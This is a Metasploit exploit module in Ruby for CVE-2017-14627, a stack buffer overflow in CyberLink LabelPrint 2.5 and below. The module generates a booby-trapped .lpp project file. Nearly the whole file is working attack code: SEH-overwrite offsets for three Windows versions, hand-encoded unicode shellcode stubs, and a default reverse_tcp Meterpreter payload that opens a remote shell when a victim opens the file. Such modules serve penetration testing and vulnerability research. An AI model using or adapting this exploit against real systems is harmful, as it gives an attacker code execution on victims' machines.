##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "CyberLink LabelPrint 2.5 Stack Buffer Overflow",
        'Description' => %q{
          This module exploits a stack buffer overflow in CyberLink LabelPrint 2.5 and below.
          The vulnerability is triggered when opening a .lpp project file containing overly long string characters
          via open file menu. This results in overwriting a structured exception handler record and take over the
          application. This module has been tested on Windows 7 (64 bit), Windows 8.1 (64 bit), and Windows 10 (64 bit).
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'modpr0be <tom@spentera.id>', # initial discovery and metasploit module
          'f3ci <marie@spentera.id>' # unicode kungfu
        ],
        'References' => [
          [ 'CVE', '2017-14627' ],
          [ 'EDB', '42777' ]
        ],
        'DefaultOptions' => {
          'FILENAME' => 'msf.lpp',
          'EXITFUNC' => 'seh',
          'DisablePayloadHandler' => true,
          'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
        },
        'Platform' => 'win',
        'Targets' => [
          [
            'CyberLink LabelPrint <= 2.5 on Windows 7 (64 bit)',
            {
              'Ret' => "\x2c\x44",
              'Offset' => 790,
              'Padding1' => 857,
              'Padding2' => 104
            }
          ],
          [
            'CyberLink LabelPrint <= 2.5 on Windows 8.1 x64',
            {
              'Ret' => "\x2c\x44",
              'Offset' => 790,
              'Padding1' => 845,
              'Padding2' => 116
            }
          ],
          [
            'CyberLink LabelPrint <= 2.5 on Windows 10 x64 build 1803',
            {
              'Ret' => "\x2c\x44",
              'Offset' => 790,
              'Padding1' => 781,
              'Padding2' => 180
            }
          ],
        ],
        'Payload' => {
          'Space' => 15000,
          'DisableNops' => true
        },
        'DisclosureDate' => '2017-09-23',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  def get_payload(hunter)
    enc = framework.encoders.create('x86/unicode_mixed')
    enc.datastore.import_options_from_hash({ 'BufferRegister' => 'EAX' })
    hunter = enc.encode(hunter, nil, nil, platform)
  end

  def exploit
    nop = "\x42"
    junk = 'ABC'.split('').sample # junk must specifically static (A, B, and C only)
    buffer = ""
    buffer << junk * target['Offset']
    buffer << "\x61\x42"       # nseh
    buffer << target['Ret']    # seh

    # we need to encode the RET address, since RET (\xc3) is known as bad char.
    # preparing address to land the decoded RET
    buffer << nop              # nop/inc edx
    buffer << "\x54"           # push esp
    buffer << nop              # nop/inc edx
    buffer << "\x58"           # pop eax
    buffer << nop              # nop/inc edx
    buffer << "\x05\x1B\x01"   # add eax 01001B00
    buffer << nop              # nop/inc edx
    buffer << "\x2d\x01\x01"   # sub eax 01001000
    buffer << nop              # nop/inc edx
    buffer << "\x50"           # push eax
    buffer << nop              # nop/inc edx
    buffer << "\x5c"           # pop esp

    # preparing RET opcode (c300c300)
    buffer << nop              # nop/inc edx
    buffer << "\x25\x7e\x7e"   # and eax,7e007e00
    buffer << nop              # nop/inc edx
    buffer << "\x25\x01\x01"   # and eax,01000100
    buffer << nop              # nop/inc edx
    buffer << "\x35\x7f\x7f"   # xor eax,7f007f00
    buffer << nop              # nop/inc edx
    buffer << "\x05\x44\x44"   # add eax,44004400
    buffer << nop              # nop/inc edx
    buffer << "\x57"           # push edi as padding, needed to align stack
    buffer << nop              # nop/inc edx
    buffer << "\x50"           # push eax
    buffer << junk * target['Padding1'] # OS specific

    # custom venetian to reach shellcode
    buffer << "\x58"           # pop eax
    buffer << nop              # nop/inc edx
    buffer << "\x58"           # pop eax
    buffer << nop              # nop/inc edx
    buffer << "\x05\x09\x01"   # depending OS
    buffer << nop              # nop/inc edx
    buffer << "\x2d\x01\x01"   # add eax, 01000100, this will align eax to our buffer
    buffer << nop              # nop/inc edx
    buffer << "\x50"           # push eax
    buffer << nop              # nop/inc edx

    # crafting call esp at 0x7c32537b (MFC71U.dll) to make a jump using call esp
    buffer << "\x5C"           # pop esp
    buffer << nop              # nop/inc edx
    buffer << "\x58"           # pop eax
    buffer << nop              # nop/inc edx
    buffer << "\x05\x53\x7c"   # add eax 7c005300 part of call esp
    buffer << nop              # nop/inc edx
    buffer << "\x50"           # push eax
    buffer << junk * target['Padding2'] # OS specific
    buffer << "\x7b\x32" # part of call esp

    # preparing for jump to shellcode, placing in eax.
    buffer << junk * 114       # junk
    buffer << "\x57"           # push edi
    buffer << nop              # nop/inc edx
    buffer << "\x58"           # pop eax
    buffer << nop              # nop/inc edx
    buffer << "\x05\x0A\x01"   # depending OS
    buffer << nop              # nop/inc edx
    buffer << "\x2d\x01\x01"   # sub eax,01000100
    buffer << nop              # nop/inc edx
    buffer << get_payload(payload.encoded)
    buffer << junk * (payload.space - buffer.length) # fill the rest of buffer, must be added.

    lpp_data = <<-EOS
    <PROJECT version="1.0.00">
      <INFORMATION title="" author="" date="#{rand(1..12)}/#{rand(1..28)}/#{(1970..2020).to_a.sample}" SystemTime="#{rand(1..12)}/#{rand(1..28)}/#{(1970..2020).to_a.sample}">
        <TRACK name="#{buffer}" />
      </INFORMATION>
    </PROJECT>
    EOS

    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create(lpp_data)
  end
end